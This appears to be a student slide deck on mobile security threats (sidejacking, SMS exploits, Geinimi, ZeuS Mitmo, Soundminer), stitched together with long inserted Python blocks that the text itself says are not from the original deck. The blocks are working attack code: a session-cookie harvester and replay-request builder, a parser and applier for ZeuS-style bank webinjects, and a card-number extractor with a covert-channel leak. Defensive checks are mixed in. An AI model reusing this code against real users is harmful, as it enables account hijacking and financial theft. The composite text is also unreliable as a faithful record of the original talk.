      On 24 October 2010, a Firefox extension named "Firesheep" was released to conduct "sidejacking": capturing session cookies from unencrypted HTTP traffic and reusing them
      Critical when users access the web from iPads and phones through public Wi-Fi hotspots
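Sidejacking, as the case above describes it, needs nothing more than the victim's cookies from a cleartext request on the same network. The Python below is an added example, not code from the original deck or from Firesheep itself. It walks through both halves: harvesting the session cookies named by a per-site handler from a constructed capture and building the replay request, then the server-side check a site should pass so the cookie never travels over plain HTTP. The hostnames, cookie names and cookie values are made up for the example.

```python
from typing import Dict, List

# Constructed capture of cleartext HTTP requests, as a sniffer on the same open
# Wi-Fi would see them.  Hostnames, paths and cookie values are made up.
CAPTURED_REQUESTS = [
    "GET /home HTTP/1.1\r\nHost: social.example\r\n"
    "Cookie: datr=xyz; c_user=100023; xs=3f9a1c2b; locale=en_US\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: news.example\r\nCookie: locale=en_US\r\n\r\n",
    "GET /inbox HTTP/1.1\r\nHost: social.example\r\n"
    "Cookie: datr=xyz; c_user=100023; xs=3f9a1c2b\r\n\r\n",
]

# Per-site "handler": the cookie names that carry the login session.  Firesheep
# shipped one such handler per supported site; these names are hypothetical.
SITE_HANDLERS = {"social.example": ("c_user", "xs")}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, host, path and a cookie dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies: Dict[str, str] = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            cookies[key] = value
    return {"method": method, "host": headers.get("host", ""), "path": path, "cookies": cookies}


def harvest_sessions(requests: List[str]) -> Dict[str, Dict[str, str]]:
    """Sidejacking step 1: pull every session cookie the handlers know about."""
    sessions: Dict[str, Dict[str, str]] = {}
    for raw in requests:
        req = parse_request(raw)
        wanted = SITE_HANDLERS.get(req["host"])
        if not wanted:
            continue
        found = {name: req["cookies"][name] for name in wanted if name in req["cookies"]}
        if len(found) == len(wanted):  # only a complete set logs the attacker in
            sessions[req["host"]] = found
    return sessions


def build_replay_request(host: str, path: str, cookies: Dict[str, str]) -> str:
    """Sidejacking step 2: replay the victim's cookies.  No password is needed."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n"


def audit_set_cookie(set_cookie: str) -> List[str]:
    """Server-side check on a Set-Cookie value: returns the attributes that are
    missing.  Secure keeps the cookie off plain HTTP; HttpOnly keeps it from scripts."""
    attrs = {a.strip().split("=", 1)[0].lower() for a in set_cookie.split(";")[1:]}
    return [flag for flag in ("Secure", "HttpOnly") if flag.lower() not in attrs]
```

The Secure attribute is the fix that removes the capture opportunity; pairing it with a Strict-Transport-Security header stops the browser from ever starting on http://, which is the request the sniffer was waiting for.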
    • 10. Cases and Incidents
      Case 5: Identity theft, stalking and bullying
    • 11. Story on how the mobile virus spreads
    • 12. Story on how the mobile virus spreads
    • 13. Story on how the mobile virus spreads
    • 14. Story on how the mobile virus spreads
    • 15. Story on how the mobile virus spreads
    • 16. Story on how the mobile virus spreads
    • 17. Story on how the mobile virus spreads
    • 18. The Changing Threat Environments
    • 19. Threat: Denial of service to VoIP
      Tom Cross (X-Force researcher, IBM Internet Security Systems) said:
      “Criminals know that VoIP can be used in scams to steal personal and financial data so voice spam and voice phishing are not going away”
    • 20. Threat: Denial of service to VoIP
      People are trained to enter social security numbers, credit card numbers and bank account numbers over the phone
      Criminals will exploit this social conditioning to perpetrate voice phishing and identity theft
      Customers demand better availability from phone service than they would from an ISP
      The threat of a DoS attack might therefore compel carriers to pay out on a blackmail scam
    • 21. Bluetooth hacking
    • 22. Threat: SMS Viruses
      Known as the "SMS of death"
      Threatens to disable many Sony Ericsson, Samsung, Motorola, Micromax and LG mobile phones
      Its payload?
      A single malformed text or MMS message sent to the phone
      What does it result in?
      Crashing of the mobile phone
      Some of the bugs discovered have the potential to cause problems for entire mobile networks
    • 23. Threat: SMS Viruses
      iPhone SMS attack
      A series of malicious SMS messages gave a way to crash the iPhone via SMS, and the researcher who found it thought that the crash could ultimately lead to working attack code
      Results from a bug in the iPhone's iOS software that could let attackers take over the phone just by sending SMS messages
    • 24. Threat: Man-in-mobile attacks
      Man-in-mobile works by
    • 25. Threat: Mobile eavesdropping
      FBI taps cell phone mic as eavesdropping tool
      The technique is called a "roving bug“
      Used against members of a crime family who were wary of conventional surveillance techniques such as tailing a suspect or wiretapping him
      "functioned whether the phone was powered on or off."
    • 26. Threat: Data Theft
      Data theft is the leaking of information stored on the mobile phone
      Stolen phone: remember the story from just now?
      Solution lies in TenCube's WaveSecure
    • 27. Threat: Mobile Malware
      Smart phones are being “attacked” by malicious software which could severely threaten both the users and the usefulness of the phone
      Malware:
      Cabir:
      Infects Symbian OS mobile phones
      Infected phone displays the message 'Caribe’
      The worm attempts to spread to other phones via wireless Bluetooth signals
    • 28. Threat: Mobile Malware
      Skulls:
      Trojan targeting Symbian Series 60 mobile phones
      Replaces all phone desktop icons with images of a skull
      Renders all applications unusable
    • 29. Threat: Mobile Malware
      CommWarrior:
      First worm to use MMS messages in order to spread to other devices
      Infects devices running Symbian OS Series 60
      Spreads through Bluetooth as well as MMS
      ZeuS Mitmo (man-in-the-mobile)
      Steals usernames and passwords
      By injecting HTML or adding form fields using JavaScript
    • 30. Agenda
      Current Trends
      Cases and Incidences
      Threats:
      Denial of Service to VoIP
      Bluetooth Hacking
      SMS viruses
      Man-in-mobile attacks
      Mobile eavesdropping
      Data Theft
      Mobile Viruses:
      Soundminer
      Zeus
      Geinimi
      The difference between Apple's and Android's security models
      Solutions
    • 32. Taking a closer look at the viruses we’ve been studying
    • 33. Geinimi and ZeuS in the news
    • 34. Geinimi in the news
    • 35. Geinimi
      Geinimi is a Trojan affecting Android devices
      Emerging through third-party application sources
      Geinimi means "give you rice" (Ghay-knee-mē) in Chinese, which is essentially slang for "give you money"
      Geinimi can
      Read and collect SMS messages
      Send and delete selected SMS messages
      Pull all contact information and send it to a remote server (number, name, the time they were last contacted)
      Place a phone call
      Silently download files
      Launch a web browser with a specific URL
    • 36. ZeuS
      Malicious users weren’t interested in all of the text messages — just the ones that contained authentication codes for online banking transactions
      The attack's setup
      This shows that malicious users are constantly broadening their interests. Prior to this, text message authentication was a reliable form of authentication for online banking transactions
      Now, malicious users have found a way to bypass even this level of security.
    • 37. ZeuS SymbOS/Zitmo.A = SMS malware
      The SMS-stealing component is part of the ZeuS Trojan's payload
      Called SymbOS/Zitmo.A
      The PC-side Trojan first gathers information from victims (phone number, handset model)
      So it can send them a targeted download link by SMS
      Forwards the mTAN SMS messages sent by the victim's bank to the attacker
      The attacker can then change which numbers are monitored by the spyware to go after specific banks
    • 38. SymbOS/Zitmo.A
      What we find interesting is that the SymbOS/Zitmo.A virus is great at avoiding detection!
      SymbOS/Zitmo.B process running on a Symbian phone. The spyware does not show a GUI.
    • 39. MSIL/Zitmo.B running on a device. The spyware does not show a GUI.
      The bank (account) robbers have not stopped at their first mobile spyware attempt. This time around the thieves went after bank accounts in Poland.
      They created the latest update: MSIL/Zitmo.B
      Works on Windows Mobile or other .NET Compact Framework devices, and
      SymbOS/Zitmo.B
      Latest news on SymbOS/Zitmo.A
    • 40. How ZeuS SymbOS/Zitmo.A works (1)
      The PC-side Trojan injects a request for new details into the bank's website: mobile vendor, model, phone number
      An SMS is then sent to the mobile device with a link to download the mobile component
      http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html
    • 41. How ZeuS SymbOS/Zitmo.A works (2)
      A backdoor is installed that receives commands via SMS
      The attacker sends commands for SMS attacks for their own profit (SMS charges)
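The two slides above describe the PC-side half of the Mitmo attack: a web inject that makes the bank's login page ask for handset details, which the attacker then uses to SMS a download link. The Python below is an added example, not code from the original deck or from the s21sec write-up. It parses the `set_url` / `data_before` / `data_inject` / `data_after` / `data_end` block layout used by ZeuS-family webinject configuration files, applies a constructed inject to a constructed bank form so the extra mobile fields appear the way the victim sees them, and shows the complementary check a bank can run: compare the fields the browser renders against its own form template. The bank page, URL pattern and inject text are invented for illustration.

```python
import fnmatch
import re
from dataclasses import dataclass
from typing import List, Set


@dataclass
class WebInject:
    url_pattern: str      # set_url glob the inject applies to
    flags: str            # G = GET, P = POST; other ZeuS flags are ignored here
    before: str = ""      # text after which the injection goes
    inject: str = ""      # HTML to insert
    after: str = ""       # text before which the injection ends (empty = pure insert)


def parse_webinjects(text: str) -> List[WebInject]:
    """Parse the set_url / data_before / data_inject / data_after / data_end layout."""
    injects: List[WebInject] = []
    current, section, buf = None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url"):
            parts = stripped.split(None, 2)
            current = WebInject(url_pattern=parts[1], flags=parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif stripped in ("data_before", "data_inject", "data_after"):
            section, buf = stripped[len("data_"):], []
        elif stripped == "data_end":
            if current is not None and section is not None:
                setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return injects


def _wild(pattern: str) -> str:
    """data_before / data_after are matched literally, with * as a wildcard."""
    return ".*?".join(re.escape(piece) for piece in pattern.split("*"))


def apply_injects(html: str, url: str, method: str, injects: List[WebInject]) -> str:
    """What the infected browser renders: the bank page with the extra fields inserted."""
    for inj in injects:
        if method[:1].upper() not in inj.flags.upper():
            continue
        if not fnmatch.fnmatchcase(url, inj.url_pattern):
            continue
        rx = re.compile("(" + _wild(inj.before) + ")(.*?)(" + _wild(inj.after) + ")", re.DOTALL)
        html = rx.sub(lambda m: m.group(1) + inj.inject + m.group(3), html, count=1)
    return html


def form_fields(html: str) -> Set[str]:
    """Names of <input> elements in a page."""
    return set(re.findall(r"<input[^>]*\bname=[\"']?([\w\-]+)", html, re.IGNORECASE))


def unexpected_fields(reference_html: str, served_html: str) -> Set[str]:
    """Defender's check: fields the browser shows that the bank never put in its form."""
    return form_fields(served_html) - form_fields(reference_html)


# Constructed bank login form and inject config (illustrative, not a real campaign's).
BANK_LOGIN = (
    '<form method="post" action="/login">\n'
    '<input name="user"><input name="password" type="password">\n'
    '<input type="submit" value="Log in">\n</form>'
)
WEBINJECTS = """set_url https://bank.example/login* GP
data_before
<input name="password"*>
data_end
data_inject
<p>Security update: please register your mobile phone.</p>
<input name="mobile_vendor"><input name="mobile_model"><input name="mobile_number">
data_end
data_after
data_end
"""
```

The defender's comparison is only as good as where it runs: a script served from the bank can be rewritten by the same inject, so in practice the check is done on the submitted field names server-side, or from a client the malware does not control.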
    • 42. Now to watch the Soundminer demo
    • 43. Soundminer (1)
      Low-profile Trojan horse for Android OS
      Steals data in a way that is unlikely to be detected
      Soundminer
      Monitors phone calls
      Records the credit card number
      Uses various analysis techniques
      Trims the extraneous recorded information down to the essential credit card number
      Send information back to the attacker over the network
    • 44. Soundminer (2)
      Designed to ask for as few permissions as possible
      Soundminer is paired with a separate Trojan, Deliverer => responsible for sending the information
      Android OS security mechanisms could prevent communication between applications
      Communicates via “covert channels”
      vibration settings
    • 45. Soundminer (3)
      Encodes the sensitive data as changes to the vibration setting
      Unlikely to raise suspicion
      Two antivirus programs, VirusGuard and AntiVirus, both failed to identify Soundminer as malware
      Study by Roman Schlegel, Kehuan Zhang, Xiaoyong Zhou, Mehool Intwala, Apu Kapadia and XiaoFeng Wang: Soundminer: A Stealthy and Context-Aware Sound Trojan for Smartphones
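Two points in the Soundminer slides invite a worked example: trimming the recorded digits down to the card number, and passing it to Deliverer over a covert channel so that neither app needs a suspicious permission set. The Python below is an added simulation, not the paper's code or the original deck's. `find_card_numbers` keeps only digit runs of card length that pass the Luhn check; `VibrateSetting` stands in for a system setting any app may read and write, assumed here to have three states (modelled on the vibrate setting's off / on / silent-only values, an assumption of this example) through which one app signals bits to another. The call transcript is constructed and uses the public Visa test number.

```python
import re
from typing import Callable, List


def luhn_valid(digits: str) -> bool:
    """Luhn check that every real card number passes."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_card_numbers(transcript: str) -> List[str]:
    """Trim a recognised digit stream down to card-number candidates.
    transcript: digits recovered from DTMF tones / speech; any other character
    marks a pause or prompt boundary.  Luhn alone still passes about 1 in 10
    random windows, which is why the real Trojan also used the call context."""
    found: List[str] = []
    for run in re.findall(r"\d+", transcript):
        for length in range(19, 12, -1):              # longest plausible PAN first
            for start in range(len(run) - length + 1):
                cand = run[start:start + length]
                if luhn_valid(cand) and not any(cand in f for f in found):
                    found.append(cand)
    return found


class VibrateSetting:
    """Stand-in for a setting readable and writable without any permission.
    Assumed: three states (off / on / silent-only) and observers notified on every write."""
    OFF, ON, SILENT_ONLY = 0, 1, 2

    def __init__(self) -> None:
        self.value = self.SILENT_ONLY
        self._observers: List[Callable[[int], None]] = []

    def observe(self, callback: Callable[[int], None]) -> None:
        self._observers.append(callback)

    def put(self, value: int) -> None:
        self.value = value
        for cb in self._observers:
            cb(value)


def leak_via_setting(setting: VibrateSetting, secret: str) -> int:
    """Soundminer side: one bit per write (OFF=0, ON=1), returning to SILENT_ONLY
    between bits so consecutive equal bits still show up as changes.
    Returns the number of writes made."""
    writes = 0
    for byte in secret.encode("ascii"):
        for shift in range(7, -1, -1):
            setting.put(setting.ON if (byte >> shift) & 1 else setting.OFF)
            setting.put(setting.SILENT_ONLY)
            writes += 2
    return writes


class Deliverer:
    """Second app: holds only network permission and never touches the microphone,
    yet learns the card number by watching the setting."""

    def __init__(self, setting: VibrateSetting) -> None:
        self.bits: List[int] = []
        setting.observe(self._on_change)

    def _on_change(self, value: int) -> None:
        if value != VibrateSetting.SILENT_ONLY:
            self.bits.append(value)

    def received(self) -> str:
        out = bytearray()
        for i in range(0, len(self.bits) - 7, 8):
            out.append(int("".join(map(str, self.bits[i:i + 8])), 2))
        return out.decode("ascii")


def run_pipeline(transcript: str) -> str:
    """End to end: extract the card number, pass it over the covert channel."""
    setting = VibrateSetting()
    deliverer = Deliverer(setting)
    for number in find_card_numbers(transcript):
        leak_via_setting(setting, number)
    return deliverer.received()


# Constructed transcript of a phone-banking call: IVR menu choice, account number,
# card number, expiry, CVV.  '#' marks a pause; the card number is the public test PAN.
TRANSCRIPT = "1#9876543210#4111111111111111#1226#123"
```

Nothing in the channel crosses a permission boundary: the sender only changes a setting and the receiver only observes it, which is why per-app permission review misses it and why the paper argues for policing information flows between apps rather than permissions alone.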
    • 46. iOS and Android’s Security Models
    • 47. Security Models: iOS vs Android
    • 48. Security Models: iOS vs Android
    • 49.
    • 50. Security Models: iOS vs Android
      Trend Micro believes the iOS security model is better
    • 51. Security Models: iOS vs Android
      Many believe the iOS security model is better just because Android's model is receiving a lot of bad press
    • 52. Solutions we believe to be useful for Android
    • 53. Solutions (1)
      Either create a strict app filtering process like Apple's App Store does, or create a market-crawling tool to look for potentially malicious apps
      With more granular permissions
      All the viruses could be prevented
      Or at least disclosed to the user at install time
      Sandboxing to the rescue
      Browser -> still a big deal
      Media player -> not catastrophic
      Crowd-sourcing -> getting people to report
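The market-crawling tool and the granular-permission point on the slide above can be made concrete with a static check over AndroidManifest.xml. The Python below is an added example, not tooling from the deck or from any app store. It reads the `<uses-permission>` entries and flags combinations that enable the abuse patterns discussed in this deck (SMS relay, contact harvesting, audio exfiltration, silent calling), first per app and then over the union of a publisher's apps. The manifests, package names and rule set are constructed for the example.

```python
import xml.etree.ElementTree as ET
from typing import List, Set

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Rules: (label, permissions that must all be present, permissions of which at
# least one must be present).  Illustrative thresholds, not a vendor's rule set.
RULES = [
    ("can read or intercept SMS and send SMS (Geinimi / Zitmo pattern)",
     {"SEND_SMS"}, {"READ_SMS", "RECEIVE_SMS"}),
    ("can harvest contacts and reach the network", {"READ_CONTACTS", "INTERNET"}, set()),
    ("can record audio and reach the network (Soundminer-style exfiltration)",
     {"RECORD_AUDIO", "INTERNET"}, set()),
    ("can place calls without the dialer UI", {"CALL_PHONE"}, set()),
]


def permissions(manifest_xml: str) -> Set[str]:
    """Names requested via <uses-permission>, without the android.permission. prefix."""
    root = ET.fromstring(manifest_xml)
    names: Set[str] = set()
    for node in root.iter("uses-permission"):
        name = node.get(ANDROID_NS + "name", "")
        names.add(name.rsplit(".", 1)[-1])
    return names


def fired_rules(perms: Set[str]) -> List[str]:
    """Labels of every rule whose permission combination is present."""
    return [label for label, need_all, need_any in RULES
            if need_all <= perms and (not need_any or need_any & perms)]


def scan_manifest(manifest_xml: str) -> List[str]:
    """Per-app check, the way a market crawler would run it on each upload."""
    return fired_rules(permissions(manifest_xml))


def scan_publisher(manifests: List[str]) -> List[str]:
    """Same rules over the union of permissions held by a group of apps (for
    instance all apps signed with one certificate): the only way the split
    Soundminer + Deliverer design shows up."""
    union: Set[str] = set()
    for manifest in manifests:
        union |= permissions(manifest)
    return fired_rules(union)


def _manifest(package: str, perms: List[str]) -> str:
    """Build a minimal constructed manifest; only the permission lines are shown."""
    lines = [f'<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="{package}">']
    lines += [f'  <uses-permission android:name="android.permission.{p}"/>' for p in perms]
    lines.append("</manifest>")
    return "\n".join(lines)


# Constructed manifests, not taken from real apps.
GAME_WITH_GEINIMI = _manifest("com.example.game",
                              ["INTERNET", "READ_SMS", "SEND_SMS", "READ_CONTACTS", "CALL_PHONE"])
SOUNDMINER_LIKE = _manifest("com.example.voicenotes", ["RECORD_AUDIO", "READ_PHONE_STATE"])
DELIVERER_LIKE = _manifest("com.example.wallpaper", ["INTERNET"])
```

Run per app, the rules are blind to the Soundminer/Deliverer split (neither manifest fires anything); run over the union they fire, which is the argument for grouping apps by signing certificate when crawling a market, and for showing the user the combination rather than one permission at a time.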
    • 54. Solutions (2)
      Protection is system-level, not app-level
      Bad considering the proliferation of rooted phones
      Combined with the 24-hour refund window
      Likely to see pirated apps distributed in the near future
      Third-party protection available
      e.g. SlideLock and Lookout
    • 55. Back to the iPhone vs Android’s security model
      Mobile security is a delicate balance
      restricted vs. open platforms
      Allow self-signed apps?
      Allow non-official app repositories?
      Allow free interaction between apps?
      Allow users to override security settings?
      Allow users to modify system/firmware?
      Financial motivations
    • 56. Some Simple Tips And Tricks
      Do not use any device infected with malware for exchanging data
      De-activate Bluetooth after using it
      De-activate your infrared function
      When you register on some sites, they send a confirmation or verification to your mobile phone. Always check whether a site is safe before registering on it and before clicking OK
      While saving the data, check it with Antivirus Software.
      Ignore SMS, if you don’t know the sender.
      Use mobile antivirus.
    • 57. Future Concerns?
      Attack during mobile firmware update
      Firmware loaded into the phone
      Already carries a "preloaded" virus
      Crackers -> hack the source servers or use a man-in-mobile attack
    • 58. Future Concerns?
    • 59. "There is no security on this earth, there is only opportunity" - General Douglas MacArthur (1880-1964)
      Both Jye Yiing and I would like to thank you for listening!
    • 60. Thank you for listening! Any Questions?